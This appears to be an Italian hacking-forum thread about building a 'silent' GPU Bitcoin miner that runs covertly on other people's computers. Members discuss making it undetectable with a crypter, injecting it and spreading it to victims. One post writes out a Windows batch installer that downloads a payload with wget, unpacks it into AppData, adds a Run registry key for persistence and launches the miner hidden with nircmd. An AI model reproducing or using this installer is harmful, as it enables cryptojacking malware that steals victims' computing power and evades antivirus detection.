Hyip [GUIDA] Creare un Silent GPU Miner per Bitcoin

Stato
Discussione chiusa ad ulteriori risposte.
La moneta più profittevole del momento è il Protoshare. Ha una difficoltà di appena 0.006472 e 1 PTS vale circa 0.002 BTC. Se qualcuno trova il modo di creare un silent miner di questa moneta e di fuddarla per bene, scrivesse anche una guida a riguardo.
 
La moneta più profittevole del momento è il Protoshare. Ha una difficoltà di appena 0.006472 e 1 PTS vale circa 0.002 BTC. Se qualcuno trova il modo di creare un silent miner di questa moneta e di fuddarla per bene, scrivesse anche una guida a riguardo.

Per quanto riguarda il fudding è una cosa a parte più che altro chi conosce qualche cripter buono potrebbe darcelo anche a noi o almeno dirci dove comprarlo

Inviato dal mio HTC Desire 500 utilizzando Tapatalk
 
Ma se converto il installer bat in exe e poi lo cripto fungerà o dara qualche errore?C'è un metodo per usare questa guida per minare ma con l'ignezione e non il D%D?
 
Ciao , ha me da questo errore..

PC8ig.png

Ciao , ha me da questo errore..

PC8ig.png

Probabilmente hai dimenticato di inserire il file nircmd.exe oppure hai inserito uno errato nel file compresso Rar
 
  • Mi piace
Reazioni: mega.co.nz
Ultima modifica:
SET INSTALLPATH=%appdata%\miner

Fa sì che la cartella d'installazione sia "appdata\roaming\miner\"


mkdir %INSTALLPATH%
wget.exe http://miosito.it/RAR.exe -O "%INSTALLPATH%\rar.exe"
wget.exe http://miosito.it/setup.rar -O "%INSTALLPATH%\setup.rar"
%INSTALLPATH%\RAR.exe x -o+ %INSTALLPATH%\setup.rar %INSTALLPATH%\

Scarica e lo inserisce nella cartella d'installazione.


reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "miner" /d "\"%INSTALLPATH%\nircmd.exe\" exec hide \"%INSTALLPATH%\start.bat\"" /f

Crea una chiave di registro che permette al Silent miner di avviarsi insieme al PC; nircmd si avvierà assieme a start.bat nascondendo il suo processo e "exec hide" fa sì che venga eseguito tutto in background.


start %INSTALLPATH%\nircmd.exe exec hide %INSTALLPATH%\start.bat

Esegue assieme nircmd.exe e start.bat presenti nella cartella d'installazione.



Schematizzato in questo modo posso dedurre che hai sbagliato nell'ultima parte dove chiede proprio l'avvio di nircmd.exe, per questo credo che tu abbia sbagliato O con il nome O con il file setup.rar
 
  • Mi piace
Reazioni: mega.co.nz
Controlla attentamente che nel file setup.rar sia presente nircmd.exe
Più di così non posso aiutarti.

In poche parole setup.rar viene scompattato nella cartella miner e da lì vengono eseguite tutte le operazioni, ma se su setup.exe manca il file nircmd.exe o ha un nome diverso diventa un problema.
 
Una cosa [MENTION=151785]Killshot[/MENTION] che poll è che si possono usare?
Quale consigli tu?



P.S.: A breve faro un post per metodi di spereading
 
su quale pool dobbiamo registrarci prima per avere username e password?
L'username e la password le ricevi quando ti registri su una pool; nel caso di Eligius, l'username è il tuo Bitcoin Wallet mentre la password non è presente (infatti potrai inserire qualunque password, minerai lo stesso).
 
Stato
Discussione chiusa ad ulteriori risposte.